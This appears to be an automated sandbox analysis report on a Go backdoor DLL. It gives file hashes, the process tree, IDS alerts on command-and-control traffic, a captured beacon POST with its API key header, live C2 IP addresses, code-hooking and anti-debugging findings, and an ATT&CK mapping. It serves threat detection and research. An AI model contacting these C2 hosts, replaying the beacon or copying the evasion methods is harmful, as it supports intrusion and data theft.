Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
Analysis ID:	1490750
MD5:	ff432e4003e9d7135a97bd4dc0445dc3
SHA1:	41530cb367ca6b69378179b4bba91deaf7d3a342
SHA256:	03495c3e0d041d6c6c1949cf6cfabea9b3d4308fee9cbf85754bb00b434d3778
Tags:	dll
Infos:

Detection

GO Backdoor

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected GO Backdoor

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Found Tor onion address

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Switches to a custom stack to bypass stack traces

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Entry point lies outside standard sections

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6860 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6996 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 7100 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7020 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 5480 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7132 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 3060 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: rundll32.exe PID: 7020	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security
Process Memory Space: rundll32.exe PID: 7100	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security
Process Memory Space: rundll32.exe PID: 7132	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security

Suricata Signatures

ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 - Source IP: 192.168.2.4 - Destination IP: 94.103.90.9

Timestamp:	2024-08-09T19:28:49.448134+0200
SID:	2855536
Severity:	1
Source Port:	49739
Destination Port:	26395
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 - Source IP: 94.103.90.9 - Destination IP: 192.168.2.4

Timestamp:	2024-08-09T19:28:49.429828+0200
SID:	2855539
Severity:	1
Source Port:	26395
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 - Source IP: 94.103.90.9 - Destination IP: 192.168.2.4

Timestamp:	2024-08-09T19:29:19.090843+0200
SID:	2855538
Severity:	1
Source Port:	26395
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 - Source IP: 192.168.2.4 - Destination IP: 94.103.90.9

Timestamp:	2024-08-09T19:29:18.867934+0200
SID:	2855537
Severity:	1
Source Port:	49739
Destination Port:	26395
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Host: 195.2.70.38User-Agent: Go-http-client/1.1Content-Length: 158X-Api-Key: 4bxNKbGLAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Source: Network traffic	Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.90.9:26395 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.4:49739 -> 94.103.90.9:26395
Source: Network traffic	Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.4:49739 -> 94.103.90.9:26395
Source: Network traffic	Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 94.103.90.9:26395 -> 192.168.2.4:49739

Source: rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38
Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56
Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.63
Source: rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123
Source: rundll32.exe, 00000003.00000002.3540798444.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3540798444.000000000D05C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123http://195.2.70.38
Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	String found in binary or memory: https://www.globalsign.com/repository/0

System Summary

PE file contains section with special chars

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: becb`
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: [e[fe
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: ^^STU
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: bY^eU
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: Y\d^_
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: T]^[_
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: eZ]e\
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: f^Ycc

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Static PE information: invalid certificate

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Static PE information: Number of sections : 12 > 10

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: classification engine

Classification label: mal88.troj.evad.winDLL@14/1@0/6

Source: C:\Windows\System32\loaddll32.exe

File created: C:\Users\user\AppData\Local\config

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_03

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Static PE information: Image base 0x6c2c0000 > 0x60000000

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Static file information: File size 15196072 > 1048576

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Static PE information: Raw size of TUaYW is bigger than: 0x100000 < 0xe77600

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: initial sample

Static PE information: section where entry point is pointing to: TUaYW

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: becb`
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: [e[fe
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: ^^STU
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: bY^eU
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: a_SfU
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: Y\d^_
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: T]^[_
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: eZ]e\
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: f^Ycc
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: cUfXW
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: TUaYW
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	Static PE information: section name: SZVZY

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 6860 base: 16F0005 value: E9 8B 2F 81 75	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 6860 base: 76F02F90 value: E9 7A D0 7E 8A	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7020 base: 2810005 value: E9 8B 2F 6F 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7020 base: 76F02F90 value: E9 7A D0 90 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7100 base: 2E60005 value: E9 8B 2F 0A 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7100 base: 76F02F90 value: E9 7A D0 F5 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 5480 base: 4920005 value: E9 8B 2F 5E 72	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 5480 base: 76F02F90 value: E9 7A D0 A1 8D	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7132 base: 520005 value: E9 8B 2F 9E 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7132 base: 76F02F90 value: E9 7A D0 61 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 3060 base: 650005 value: E9 8B 2F 8B 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 3060 base: 76F02F90 value: E9 7A D0 74 89	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CCC5333
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C0A8385
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C0206AC
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C0F89DD
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CCFBD28
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C9CAC5A
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CBE2C2B
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CBD697D
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CCC7F85
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C799AC7
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C8036DF

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.3078250832.000000000126D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3539796517.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3539212045.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3539177203.000000000067A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.229.63 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 195.2.70.38 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.224.56 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.142.74.28 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.250.123 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 94.103.90.9 26395	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected GO Backdoor

Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7132, type: MEMORYSTR

Remote Access Functionality

Yara detected GO Backdoor

Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7132, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 Credential API Hooking	111 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Rundll32	NTDS	111 System Information Discovery	Distributed Component Object Model	Input Capture	1 Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll	37%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://77.238.224.56	0%	Avira URL Cloud	safe
http://195.2.70.38/	0%	Avira URL Cloud	safe
http://77.238.250.123/	0%	Avira URL Cloud	safe
http://77.238.250.123http://195.2.70.38	0%	Avira URL Cloud	safe
http://91.142.74.28/	0%	Avira URL Cloud	safe
http://77.238.229.63	0%	Avira URL Cloud	safe
http://77.238.250.123	0%	Avira URL Cloud	safe
http://91.142.74.28	0%	Avira URL Cloud	safe
http://77.238.229.63/	0%	Avira URL Cloud	safe
http://77.238.224.56/	0%	Avira URL Cloud	safe
http://195.2.70.38	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://195.2.70.38/	true	Avira URL Cloud: safe	unknown
http://91.142.74.28/	true	Avira URL Cloud: safe	unknown
http://77.238.229.63/	true	Avira URL Cloud: safe	unknown
http://77.238.250.123/	true	Avira URL Cloud: safe	unknown
http://77.238.224.56/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://77.238.224.56	rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123http://195.2.70.38	rundll32.exe, 00000003.00000002.3540798444.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3540798444.000000000D05C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.63	rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123	rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28	rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38	rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.142.74.28	unknown	Russian Federation	48720	VTSL1-ASRU	true
77.238.229.63	unknown	Russian Federation	42429	TELERU-ASRU	true
195.2.70.38	unknown	Russian Federation	48282	VDSINA-ASRU	true
77.238.250.123	unknown	Russian Federation	42429	TELERU-ASRU	true
